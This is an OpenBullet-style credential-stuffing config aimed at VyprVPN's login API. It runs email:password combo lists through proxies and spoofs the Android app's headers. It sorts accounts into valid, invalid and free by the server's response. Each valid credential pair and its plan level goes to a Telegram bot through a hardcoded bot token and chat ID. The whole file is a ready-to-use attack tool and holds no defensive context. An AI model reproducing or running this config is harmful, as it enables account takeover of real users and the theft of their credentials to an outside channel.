[SETTINGS]
{
  "Name": "VyprVPN(API)",
  "SuggestedBots": 15,
  "LastModified": "2019-05-19T16:35:01.3513883+04:30",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "TakTir (loliX Encrypted)",
  "Version": "1.2.1.2",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://api.goldenfrog.com/settings" 
  
  HEADER "User-Agent: okhttp/2.3.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "password: <PASS>" 
  HEADER "username: <USER>" 
  HEADER "X-GF-Agent: VyprVPN Android v2.19.0.7702. (56aa5dfd)" 
  HEADER "X-GF-PRODUCT: VyprVPN" 
  HEADER "X-GF-PRODUCT-VERSION: 2.19.0.7702" 
  HEADER "X-GF-PLATFORM: Android" 
  HEADER "X-GF-PLATFORM-VERSION: 6.0" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "account_level" 
  KEYCHAIN Failure OR 
    KEY "invalid username or password" 
  KEYCHAIN Custom "FREE" OR 
    KEY "VyprVPN Free" 

PARSE "<SOURCE>" JSON "account_level_display" -> CAP "Plan" 

FUNCTION Constant "%F0%9F%8C%90Site%20%3A%20VyperVPN%0D%0A%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%20%0D%0A%F0%9F%94%90Combo%20%3A%20<USER>%3A<PASS>%0D%0A%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%E2%9E%96%20%0D%0A%F0%9F%93%9FAccount%20level%3A%20<Plan>" -> VAR "TXT" 

REQUEST GET "https://api.telegram.org/bot865187254:AAGESw8gQt6gBhQ2hAU6W0xW3Z7p54huOU0/SendMessage?chat_id=-354374813&text=<TXT>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

